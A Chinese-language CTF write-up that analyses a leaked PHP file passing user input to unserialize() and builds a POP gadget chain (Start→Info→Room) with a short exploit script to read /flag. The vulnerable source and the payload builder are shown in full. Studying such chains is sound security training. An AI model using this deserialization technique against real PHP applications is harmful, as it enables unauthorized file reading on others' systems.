题目打开,说有hint在/etc 下面,又说需要看源码
说明有源码泄露,找找在哪里
扫目录拿到一个 www.zip ,打开里面只有一个index.php
源码如下
<meta charset="utf-8">
<?php
//hint is in hint.php
error_reporting(1);
class Start
{
public $name='guest';
public $flag='syst3m("cat 127.0.0.1/etc/hint");';
public function __construct(){
echo "I think you need /etc/hint . Before this you need to see the source code";
}
public function _sayhello(){
echo $this->name;
return 'ok';
}
public function __wakeup(){
echo "hi";
$this->_sayhello();
}
public function __get($cc){
echo "give you flag : ".$this->flag;
return ;
}
}
class Info
{
private $phonenumber=123123;
public $promise='I do';
public function __construct(){
$this->promise='I will not !!!!';
return $this->promise;
}
public function __toString(){
return $this->file['filename']->ffiillee['ffiilleennaammee'];
}
}
class Room
{
public $filename='/flag';
public $sth_to_set;
public $a='';
public function __get($name){
$function = $this->a;
return $function();
}
public function Get_hint($file){
$hint=base64_encode(file_get_contents($file));
echo $hint;
return ;
}
public function __invoke(){
$content = $this->Get_hint($this->filename);
echo $content;
}
}
if(isset($_GET['hello'])){
unserialize($_GET['hello']);
}else{
$hi = new Start();
}
?>pop链构造
Room 里面有 echo /flag,调用 __invoke() 即可,__get 方法里面有函数调用操作,可以用来调用 Room 类本身来触发__invoke()。
触发__get():从不可访问的属性读取数据,传入不可访问或不存在的参数时触发
Info 里面有赋值不存在变量的操作
Start 里面有 echo name,给 name 赋值为 new Info 触发__tosting()
exp:
$R=new Room;
$I=new Info;
$S=new Start;
$R->a=$R;
$I->file['filename']=$R;
$S->name=$I;
echo(urlencode(serialize($S)));最后输出解码时,一定要记得去掉前面的 hi。